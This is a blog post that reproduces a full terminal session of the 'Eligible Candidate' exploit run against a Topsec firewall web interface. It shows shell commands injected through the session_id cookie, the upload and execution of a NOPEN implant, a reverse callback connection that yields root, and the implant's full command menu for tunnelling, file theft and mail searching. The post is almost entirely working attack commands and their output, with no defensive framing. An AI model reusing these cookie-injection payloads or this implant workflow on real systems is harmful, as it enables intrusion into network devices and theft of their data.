# Eligible Candidate (ELCA) exploit 


# cat ELCA.txt
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471457257.4
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = None :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'', cert=None, cid=None, color=False, debug=False, func=<unbound method ELCAExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Etag - 439-345-4cb57ebd; Last modified - Wed Oct 13 10:41:17 2010
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Wed, 13 Oct 2010 09:41:17 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- "439-345-4cb57ebd"
[+] Touch result: Header: date -- Wed, 17 Aug 2016 18:06:54 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190737.log and /current/down/fosho/2016-08-17-190737_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l probe
[+] Seeded PRNG with 1471457319.73
[+] Preparing to run specified command...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Detected cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target', 'cid']
Namespace(ask=False, binpath=u'', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Checking current /site/pages/index.html etag
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Running touch on /site/pages/index.html
[+] Running command on target: x`touch /w*/*/*/p*/*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`touch /w*/*/*/p*/*`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Checking etag again to confirm
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190839.log and /current/down/fosho/2016-08-17-190839_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l exploit -p noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static -c 127.0.0.1:1234
[+] Seeded PRNG with 1471457351.78
[+] Preparing to run specified command...
[+] Already know cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath = noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode', 'cid']
Namespace(ask=False, binpath='noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Cleaning up /tmp/ ...
[+] Running command on target: x`rm -f /t*/cgi*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`rm -f /t*/cgi*`'}, 'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Uploading and moving file...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'uiIwq': <StringIO.StringIO instance at 0xb6dab86c>}, 'cookies': {'session_id': 'x`cp /t*/cg* /tmp/.a`'}, 'data': None}
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Making file executable...
[+] Running command on target: x`chmod +x /tmp/.a`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`chmod +x /tmp/.a`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Running payload...
[+] Running command on target: x`/tmp/.a 2>&1`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`/tmp/.a 2>&1`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190911.log and /current/down/fosho/2016-08-17-190911_http.log
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:34192
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x6FE82C9C3156C88448659B6E034C6D30
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     199/75 (265%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):34192 (127.0.0.1:34192)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 18:09:16 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4689 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.4.19 #4 Wed Oct 13 17:29:47 CST 2010 i686
  CWD
  PID (PPID)         2416 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-18:09:17"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):>-help
[08-17-16 18:09:35 GMT][localhost:1234 -> (none).127.0.0.1:34192]
[-help]

Remote General Commands:
Usage: -elevate
Usage: -getenv
Usage: -gs category|filename [options-if-any]
Usage: -setenv VAR=[val]
Usage: -shell
Usage: -status
Usage: -time

Remote Server Commands:
Usage: -burn
Usage: -call ip port
Usage: -listen port
Usage: -pid

Remote Network Commands:
Usage: -icmptime target_ip [source_ip]
Usage: -ifconfig
Usage: -nslookup name1 ...
Usage: -ping -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -ping host
       -ping [-u|-t|-i] host
Usage: -trace -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -trace host
       -trace [-u|-t|-i] host

Remote Redirection Commands:
Usage: -fixudp port
Usage: -irtun target_ip call_back_port [call_back_ip] [ourtn arguements]
Usage: -jackpop target_ip target_port source_ip source_port
Usage: -nrtun port [toip [toport]]
Usage: -nstun toip [toport [localport [srcport [command]]]]
       -nstun toip:port
Usage: -rawsend tcp_port
Usage: -rtun port [toip [toport]]
Usage: -scan
Usage: -sentry target_address source_address (tcp|udp) dest_port src_port interface
Usage: -stun toip toport [localport [srcport]]
Usage: -sutun [-t ttl] toip toport [localport [srcport]]
Usage: -tunnel [command_listen_port [udp]]
Usage: -vscan  (should add help)

Remote File Commands:
Usage: -cat remfile
Usage: -chili [-l] [-s lines] [-m max] MM-DD-YYYY remdir remfile [remfile ...]
Usage: -cksum remfile ...
Usage: -fget [MM-DD-YYYY] loclist
Usage: -get [-l] [-q] [-s minimumsize] [-m MM-DD-YYYY] remfile ...
Usage: -grep [-d] [-v] [-n] [-i] [-h] [-C number_of_context_lines] pattern file1 [file2 ...]
Usage: -oget [-a] [-q] [-s begoff] [-b begoff] [-e endoff] remfile
Usage: -put locfile remfile [mode]
Usage: -strings remfile
Usage: -tail [+/-n] remfile, + to skip n lines of remfile beginning
Usage: -touch [-t mtime:atime | refremfile] remfile
Usage: -rm remfile|remdir ...
Usage: -upload file port
Usage: -mailgrep [-l] [-m maxbytes] [-r "regexp" [-v]] [-f regexpfilename [-v]] [-a "regexp for attachments to eliminate"] [-b MM-DD-YYYY] [-e MM-DD-YYYY] [-d remotedumpfile] remotedir file1 [file2 ...]
 ex: -mailgrep -a ".doc" -r "^Fred" -b 2-28-2002 /var/spool/mail G*

Remote Directory Commands:
Usage: -find [-M | -m -mkfindsargs] [-x[m|a|c] MM-DD-YYYY] remdir [remdir...]
Usage: -ls [-1ihuRt] [-x[m|a|c] MM-DD-YYYY] [remfile|remdir ...]
Usage: -cd [remdir]
Usage: -cdp

Local Client Commands:
Usage: -autopilot port [xml]
Usage: -cmdout [locfilename]
Usage: -exit
Usage: -help
Usage: -hist
Usage: -readrc [locfile]
Usage: -remark [comment]
Usage: -rem [comment]
Usage: # [comment]
Usage: -reset

Local Environment Commands:
Usage: -lcd locdir
Usage: -lgetenv
Usage: -lpwd
Usage: -lsetenv VAR=[val]
Usage: -lsh [[-q] command]

Aliases:

NO! (none):>
Posted by t0n1
Labels: , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)